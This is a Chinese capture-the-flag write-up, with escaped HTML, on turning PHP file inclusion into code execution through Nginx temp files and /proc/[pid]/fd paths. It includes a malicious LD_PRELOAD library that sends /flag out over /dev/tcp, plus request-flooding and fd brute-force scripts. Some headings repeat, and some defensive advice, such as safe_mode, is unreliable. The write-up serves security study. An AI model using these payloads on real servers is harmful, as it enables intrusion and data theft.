Nginx临时文件利用：从LFI到RCE的深入分析<\/h1>

1. 漏洞背景与原理<\/h2>
本技术文档基于HFCTF 2022的ezphp题目，探讨如何利用Nginx处理大请求体时产生的临时文件实现从本地文件包含(LFI)到远程代码执行(RCE)的转换。<\/p>

1.1 核心漏洞点<\/h3>

Nginx临时文件机制<\/strong>：当Nginx接收的FastCGI响应过大或请求体过大时，会将内容缓存到临时文件<\/li>
文件描述符保留<\/strong>：Nginx创建临时文件后会立即删除(unlink)，但仍保留文件描述符(fd)<\/li>

PHP包含特性<\/strong>：PHP在处理包含路径时会对\/proc\/[pid]\/fd\/[fd]这样的软链接进行解析<\/li> <\/ul>
1.2 相关配置参数<\/h3>

client_body_buffer_size<\/code>：控制Nginx读取客户端请求体的缓冲区大小默认值：8K (x86\/32位平台) 或 16K (64位平台)<\/li> 当请求体超过此大小时，Nginx会将内容写入临时文件<\/li> <\/ul> <\/li> <\/ul> 2. 技术细节分析<\/h2> 2.1 Nginx临时文件处理机制<\/h3> Nginx通过ngx_open_tempfile<\/code>函数创建临时文件：<\/p> ngx_fd_t ngx_open_tempfile<\/span>(u_char *<\/span>name, ngx_uint_t persistent, ngx_uint_t access) { <\/span><\/span> ngx_fd_t fd; <\/span><\/span> fd =<\/span> open((const<\/span> char<\/span> *<\/span>)name, O_CREAT|<\/span>O_EXCL|<\/span>O_RDWR, access ?<\/span> access : 0600<\/span>); <\/span><\/span> if<\/span> (fd !=<\/span> -<\/span>1<\/span> &&<\/span> !<\/span>persistent) { <\/span><\/span> (void<\/span>)unlink((const<\/span> char<\/span> *<\/span>)name); <\/span><\/span> } <\/span><\/span> return<\/span> fd; <\/span><\/span>} <\/span><\/span><\/code><\/pre>关键行为：<\/p> 使用O_EXCL<\/code>标志创建文件确保唯一性<\/li> 立即调用unlink<\/code>删除文件（除非指定persistent）<\/li> 返回文件描述符供后续使用<\/li> <\/ol> 2.2 临时文件特征<\/h3> 存储路径：\/var\/lib\/nginx\/body\/000000xxxx<\/code><\/li> 文件名格式：10位数字，左侧补零<\/li> 文件权限：0600（仅所有者可读写）<\/li> <\/ul> 2.3 \/proc文件系统特性<\/h3> 在Linux系统中，即使文件被删除，只要进程保持文件描述符打开：<\/p> \/proc\/[pid]\/fd\/[fd]<\/code>仍可访问文件内容<\/li> 显示为\/path\/to\/file (deleted)<\/code>的软链接<\/li> <\/ul> 3. 利用方法<\/h2> 3.1 整体利用流程<\/h3> 触发临时文件创建<\/strong>：发送超大请求体，迫使Nginx创建临时文件<\/li> 保持文件描述符<\/strong>：Nginx删除文件但保留fd<\/li> LD_PRELOAD注入<\/strong>：通过PHP的putenv<\/code>设置LD_PRELOAD<\/code>环境变量<\/li> 包含\/proc文件<\/strong>：利用PHP包含\/proc\/[nginx-pid]\/fd\/[fd]<\/code>执行恶意代码<\/li> <\/ol> 3.2 具体步骤<\/h3> 步骤1：准备恶意.so文件<\/h4> 编写恶意共享库，利用__attribute__((constructor))<\/code>实现自动执行：<\/p> #include<\/span> <stdlib.h><\/span> <\/span><\/span><\/span>#include<\/span> <string.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>__attribute__((constructor)) void<\/span> call() { <\/span><\/span> unsetenv("LD_PRELOAD"<\/span>); <\/span><\/span> char<\/span> str[65536<\/span>]; <\/span><\/span> system("bash -c 'cat \/flag' > \/dev\/tcp\/ip\/port"<\/span>); <\/span><\/span> system("cat \/flag > \/var\/www\/html\/flag"<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>编译：<\/p> gcc test.c -fPIC -shared -o libsss.so <\/span><\/span><\/code><\/pre>步骤2：触发临时文件创建<\/h4> 使用Python脚本持续发送大请求：<\/p> import<\/span> requests <\/span><\/span> <\/span><\/span>URL =<\/span> 'http:\/\/target'<\/span> <\/span><\/span>with<\/span> open('libsss.so'<\/span>, 'rb'<\/span>) as<\/span> f: <\/span><\/span> payload =<\/span> f.<\/span>read() +<\/span> (16<\/span> *<\/span> 1024<\/span> *<\/span> 'A'<\/span>).<\/span>encode() <\/span><\/span> <\/span><\/span>while<\/span> True<\/span>: <\/span><\/span> requests.<\/span>get(URL, data=<\/span>payload) <\/span><\/span><\/code><\/pre>步骤3：爆破\/proc文件<\/h4> import<\/span> requests <\/span><\/span>import<\/span> threading <\/span><\/span> <\/span><\/span>SERVER =<\/span> "http:\/\/target"<\/span> <\/span><\/span>nginx_pids =<\/span> range(10<\/span>, 20<\/span>) # 常见的Nginx worker进程PID范围<\/span> <\/span><\/span> <\/span><\/span>def<\/span> read_file<\/span>(pid, fd): <\/span><\/span> path =<\/span> f<\/span>"\/proc\/<\/span>{<\/span>pid}<\/span>\/fd\/<\/span>{<\/span>fd}<\/span>"<\/span> <\/span><\/span> try<\/span>: <\/span><\/span> r =<\/span> requests.<\/span>get(SERVER, params=<\/span>{'env'<\/span>: f<\/span>'LD_PRELOAD=<\/span>{<\/span>path}<\/span>'<\/span>}) <\/span><\/span> if<\/span> 'HFCTF'<\/span> in<\/span> r.<\/span>text: <\/span><\/span> print("[+] Found flag:"<\/span>, r.<\/span>text) <\/span><\/span> except<\/span>: <\/span><\/span> pass<\/span> <\/span><\/span> <\/span><\/span>for<\/span> pid in<\/span> nginx_pids: <\/span><\/span> for<\/span> fd in<\/span> range(4<\/span>, 32<\/span>): # 常见的文件描述符范围<\/span> <\/span><\/span> threading.<\/span>Thread(target=<\/span>read_file, args=<\/span>(pid, fd)).<\/span>start() <\/span><\/span><\/code><\/pre>3.3 优化技术<\/h3> 多进程\/多线程<\/strong>：并行发送请求和爆破提高成功率<\/li> 路径随机化<\/strong>：增加随机路径组件绕过可能的限制<\/li> PID预测<\/strong>：通过观察Nginx worker进程的常见PID范围缩小爆破范围<\/li> <\/ol> 4. 防御措施<\/h2> 限制请求体大小<\/strong>： client_max_body_size<\/span> 1M<\/span>; <\/span><\/span><\/code><\/pre><\/li> 禁用危险函数<\/strong>： disable_functions<\/span> =<\/span> putenv<\/span>, system<\/span>, exec<\/span>, etc<\/span>.<\/span> <\/span><\/span><\/code><\/pre><\/li> 限制环境变量操作<\/strong>： safe_mode<\/span> =<\/span> On<\/span> <\/span><\/span><\/code><\/pre><\/li> 隔离\/proc访问<\/strong>： location<\/span> ~ ^\/proc\/<\/span> { <\/span><\/span> deny<\/span> all<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ol> 5. 相关CVE<\/h2> CVE-2019-11043：与Nginx+PHP-FPM相关的漏洞<\/li> CVE-2019-9638：PHP的include_once竞争条件漏洞<\/li> <\/ul> 6. 总结<\/h2> 这种利用方式展示了如何将：<\/p> Nginx的临时文件处理机制<\/li> Linux的\/proc文件系统特性<\/li> PHP的环境变量和包含功能<\/li> <\/ol> 结合起来实现从简单的LFI到完全的RCE。关键在于理解各组件之间的交互和竞争条件，以及如何利用系统特性维持对"已删除"文件的访问。<\/p>

Nginx临时文件利用：从LFI到RCE的深入分析<\/h1>

1. 漏洞背景与原理<\/h2> 本技术文档基于HFCTF 2022的ezphp题目，探讨如何利用Nginx处理大请求体时产生的临时文件实现从本地文件包含(LFI)到远程代码执行(RCE)的转换。<\/p>

2. 技术细节分析<\/h2>

3. 利用方法<\/h2>

3.2 具体步骤<\/h3>

1. 漏洞背景与原理<\/h2>
本技术文档基于HFCTF 2022的ezphp题目，探讨如何利用Nginx处理大请求体时产生的临时文件实现从本地文件包含(LFI)到远程代码执行(RCE)的转换。<\/p>